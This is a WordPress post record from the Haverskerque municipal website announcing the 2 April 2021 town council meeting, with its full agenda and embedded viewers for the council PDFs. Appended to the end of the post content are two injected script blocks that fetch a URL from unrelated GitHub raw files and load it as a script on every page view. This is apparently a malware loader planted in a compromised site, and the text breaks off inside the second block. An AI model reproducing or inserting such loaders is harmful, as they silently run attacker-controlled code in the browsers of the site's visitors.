{"id":620,"date":"2021-04-03T15:08:00","date_gmt":"2021-04-03T13:08:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=620"},"modified":"2024-07-29T06:39:07","modified_gmt":"2024-07-29T04:39:07","slug":"conseil-municipal-du-02-avril-2021","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/","title":{"rendered":"Conseil Municipal du 02 Avril 2021"},"content":{"rendered":"\n<p><em><strong>Le Conseil Municipal se r\u00e9unira ce vendredi 2 avril 2021 \u00e0 19h00.<\/strong><\/em><\/p>\n\n\n\n<p><em><strong>En cette p\u00e9riode de confinement et compte tenu des horaires de couvre-feu, l\u2019assistance, pour un citoyen, aux d\u00e9bats du conseil municipal ne constitue pas un motif d\u2019autorisation de sortie d\u00e9rogatoire. Ainsi, le maire ou le pr\u00e9sident ne peut autoriser l\u2019acc\u00e8s au public des s\u00e9ances de l\u2019organe d\u00e9lib\u00e9rant que pour les journalistes ou les personnes qui justifieraient d\u2019un motif professionnel pour y assister. Une retransmission en direct de la s\u00e9ance sera donc assur\u00e9e sur la page Facebook de la commune afin de permettre \u00e0 tous d\u2019assister aux d\u00e9bats.<br><\/strong><\/em><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR&nbsp;:<\/h3>\n\n\n\n<p><strong>&#8211; APPROBATION DU PROC\u00c8S-VERBAL DU CONSEIL MUNICIPAL DU 18 JANVIER 2021.<\/strong><\/p>\n\n\n\n<p><strong>&#8211; FINANCES<\/strong><\/p>\n\n\n\n<p>1. Fiscalit\u00e9 2021.<br>2. Vote du compte de gestion 2020 &#8211; Ville.<br>3. Vote du compte administratif 2020 &#8211; Ville.<br>4. Affectation des r\u00e9sultats 2020 &#8211; Ville.<br>5. Vote du budget primitif 2021 &#8211; Ville.<br>6. Attribution de subventions aux associations.<br>7. Attribution de subventions aux personnes de droit priv\u00e9.<br>8. Fixation des tarifs municipaux 2021.<br>9. Demande de subvention au titre de la s\u00e9curisation des routes d\u00e9partementales en agglom\u00e9ration pour l\u2019exercice 2021 &#8211; Installation de deux radars p\u00e9dagogiques rue de Merville.<br>10. Modernisation des moyens de paiement de la Ville &#8211; Adh\u00e9sion au service PayFip R\u00e9gie.<br>11. Modernisation des moyens de paiement de la Ville &#8211; Mise en place du paiement par carte bancaire via une r\u00e9gie avec compte DFT.<\/p>\n\n\n\n<p><strong>&#8211; AFFAIRES G\u00c9N\u00c9RALES<\/strong><\/p>\n\n\n\n<p>12. Renouvellement du bureau de l\u2019association fonci\u00e8re de remembrement.<br>13. Convention d\u2019entretien du domaine public d\u00e9partemental en agglom\u00e9ration relative \u00e0 la signalisation horizontale&nbsp;: Autorisation de prise en charge de lentretien et signature de la convention.<br>14. Cr\u00e9ation d\u2019un poste de conseiller municipal d\u00e9l\u00e9gu\u00e9 \u00e0 la communication.<br>15. Fixation des indemnit\u00e9s de fonctions du conseiller municipal d\u00e9l\u00e9gu\u00e9 \u00e0 la communication.<\/p>\n\n\n\n<p><strong>&#8211; INTERCOMMUNALIT\u00c9<\/strong><\/p>\n\n\n\n<p>16. Transfert de la comp\u00e9tence Plan Local d\u2019Urbanisme \u00e0 l\u2019intercommunalit\u00e9&nbsp;: refus de la commune d\u2019Haverskerque.<br>17. Transfert de la comp\u00e9tence mobilit\u00e9 \u00e0 l\u2019intercommunalit\u00e9&nbsp;: accord de la commune d\u2019Haverskerque.<br>18. Mise \u00e0 disposition du b\u00e2timent de l\u2019Arsenal dans le cadre de la cr\u00e9ation d\u2019un \u00ab\u00a0espace sant\u00e9\u00a0\u00bb ou d\u2019une \u00ab\u00a0maison de sant\u00e9 pluridisciplinaire\u00a0\u00bb&nbsp;: Autorisation de travaux de r\u00e9habilitation par le CIAS Flandre-Lys et signature d\u2019une convention.<br>19. Am\u00e9nagement par la CCFL d\u2019un parking rue de l\u2019\u00c9glise \u00e0 Haverskerque&nbsp;: Autorisation de travaux et signature d\u2019une convention.<\/p>\n\n\n\n<p><strong>&#8211; RESSOURCES HUMAINES<\/strong><\/p>\n\n\n\n<p>20. Mise en \u0153uvre du dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune.<br>21. Tableau des effectifs\u00a0: Mise \u00e0 jour au 01\/04\/2021.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2242\"  _slug=\"ordre-du-jour-de-la-seance-du-02-avril-2021\" data-title=\"ordre-du-jour-de-la-seance-du-02-avril-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Ordre du jour de la s\u00e9ance du 02 Avril 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2242 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/oj_cm_02042021.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2239\"  _slug=\"compte-rendu-du-conseil-municipal-du-02-avril-2021\" data-title=\"compte-rendu-du-conseil-municipal-du-02-avril-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte-rendu du Conseil Municipal du 02 Avril 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2239 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/proces_verbal_du_conseil_municipal_du_02_04_2021-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2236\"  _slug=\"fiscalite-2021\" data-title=\"fiscalite-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Fiscalit\u00e9 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2236 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/002_2021_fiscalite_2021.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2233\"  _slug=\"etat-de-notification-des-produits-previsionnels-et-des-taux-dimposition-des-taxes-directes-locales-2021\" data-title=\"etat-de-notification-des-produits-previsionnels-et-des-taux-dimposition-des-taxes-directes-locales-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >\u00c9tat de notification des produits pr\u00e9visionnels et des taux d\u2019imposition des taxes directes locales 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2233 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/etat_1259_pour_l_annee_2021_commune_d_haverskerque-annexe-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2230\"  _slug=\"compte-de-gestion-2020\" data-title=\"compte-de-gestion-2020\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte de gestion 2020<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2230 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/003_2021_compte_de_gestion_2020.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2227\"  _slug=\"compte-administratif-2020\" data-title=\"compte-administratif-2020\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte administratif 2020<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2227 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/004_2021_compte_administratif_2020.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2224\"  _slug=\"vote-du-compte-administratif-2020-annexe-tamponne\" data-title=\"vote-du-compte-administratif-2020-annexe-tamponne\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Vote du compte administratif 2020 annexe tamponn\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2224 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/vote_du_compte_administratif_2020_-_ville-annexe-tamponne-1.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2221\"  _slug=\"affectation-des-resultats-2020\" data-title=\"affectation-des-resultats-2020\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Affectation des r\u00e9sultats 2020<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2221 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/005_2021_affectation_des_resultats_2020.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2218\"  _slug=\"vote-du-budget-primitif-2021\" data-title=\"vote-du-budget-primitif-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Vote du budget primitif 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2218 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/006_2021_vote_du_bp_2021-1.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2213\"  _slug=\"vote-du-budget-primitif-2021-annexe-tamponne\" data-title=\"vote-du-budget-primitif-2021-annexe-tamponne\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Vote du budget primitif 2021 annexe tamponn\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2213 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/vote_du_budget_primitif_2021_-_ville-annexe-tamponne-1.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2210\"  _slug=\"subventions-2021-aux-associations\" data-title=\"subventions-2021-aux-associations\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Subventions 2021 aux associations<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2210 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/007_2021_subventions_2021_aux_associations.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2207\"  _slug=\"subventions-2021-aux-personnes-de-droit-prive\" data-title=\"subventions-2021-aux-personnes-de-droit-prive\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Subventions 2021 aux personnes de droit priv\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2207 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/008_2021_subventions_2021_aux_personnes_de_droit_prive.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2204\"  _slug=\"fixation-des-tarifs-municipaux\" data-title=\"fixation-des-tarifs-municipaux\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Fixation des tarifs municipaux<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2204 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/009_2021_fixation_des_tarifs_municipaux.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2201\"  _slug=\"demande-de-subvention-asrda-2021\" data-title=\"demande-de-subvention-asrda-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Demande de subvention ASRDA 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2201 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/010_2021_demande_de_subvention_asrda_2021.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2198\"  _slug=\"payfip-regie\" data-title=\"payfip-regie\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >PayFip R\u00e9gie<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2198 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/011_2021_payfip_regie.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2195\"  _slug=\"compte-dft\" data-title=\"compte-dft\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte DFT<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2195 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/012_2021_compte_dft.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2192\"  _slug=\"renouvellement-des-membres-de-lafr\" data-title=\"renouvellement-des-membres-de-lafr\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Renouvellement des membres de l\u2019AFR<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2192 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/013_2021_renouvellement_des_membres_de_l_afr.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2189\"  _slug=\"convention-dentretien-du-dp-cd59\" data-title=\"convention-dentretien-du-dp-cd59\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Convention d\u2019entretien du DP CD59<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2189 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/014_2021_convention_d_entretien_du_dp_cd59.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2186\"  _slug=\"creation-dun-4e-poste-de-conseiller-municipal-delegue\" data-title=\"creation-dun-4e-poste-de-conseiller-municipal-delegue\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Cr\u00e9ation d\u2019un 4e poste de Conseiller Municipal D\u00e9l\u00e9gu\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2186 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/015_2021_creation_d_un_4e_poste_de_cmd.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2183\"  _slug=\"indemnite-conseiller-municipal-delegue\" data-title=\"indemnite-conseiller-municipal-delegue\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Indemnit\u00e9 Conseiller Municipal D\u00e9l\u00e9gu\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2183 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/016_2021_indemnite_cmd.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2180\"  _slug=\"refus-de-transfert-de-la-competence-plu\" data-title=\"refus-de-transfert-de-la-competence-plu\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Refus de transfert de la comp\u00e9tence PLU<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2180 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/017_2021_refus_de_transfert_de_la_competence_plu.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2177\"  _slug=\"accord-de-transfert-de-la-competence-mobilite-a-la-ccfl\" data-title=\"accord-de-transfert-de-la-competence-mobilite-a-la-ccfl\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Accord de transfert de la comp\u00e9tence mobilit\u00e9 \u00e0 la CCFL<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2177 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/018_2021_accord_de_transfert_de_la_competence_mobilite_a_la_ccfl.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2174\"  _slug=\"mise-a-disposition-du-batiment-de-larsenal-aupres-du-cias-pour-maison-de-sante-pluridisciplinaire\" data-title=\"mise-a-disposition-du-batiment-de-larsenal-aupres-du-cias-pour-maison-de-sante-pluridisciplinaire\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Mise \u00e0 disposition du b\u00e2timent de l\u2019arsenal aupr\u00e8s du CIAS pour \u00ab\u00a0maison de sant\u00e9 pluridisciplinaire\u00a0\u00bb<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2174 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/019_2021_mise_a_disposition_du_batiment_de_l_arsenal_aupres_du_cias.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2171\"  _slug=\"amenagement-par-la-ccfl-dun-parking-rue-de-leglise\" data-title=\"amenagement-par-la-ccfl-dun-parking-rue-de-leglise\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Am\u00e9nagement par la CCFL d\u2019un parking rue de l\u2019\u00e9glise<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2171 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/020_2021_amenagement_par_la_ccfl_d_un_parking_rue_de_l_eglise.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2168\"  _slug=\"mise-en-oeuvre-contrat-dengagement-educatif\" data-title=\"mise-en-oeuvre-contrat-dengagement-educatif\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Mise en \u0153uvre Contrat d\u2019Engagement \u00c9ducatif<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2168 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/021_2021_mise_en_oeuvre_cee.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2165\"  _slug=\"recrutement-dun-agent-en-contrat-parcours-emploi-competences\" data-title=\"recrutement-dun-agent-en-contrat-parcours-emploi-competences\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Recrutement d\u2019un agent en contrat \u00ab\u00a0Parcours Emploi Comp\u00e9tences\u00a0\u00bb<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2165 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/022_2021_recrutement_pec.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2162\"  _slug=\"tableau-des-effectifs\" data-title=\"tableau-des-effectifs\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Tableau des effectifs<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2162 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/023_2021_tableau_des_effectifs.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            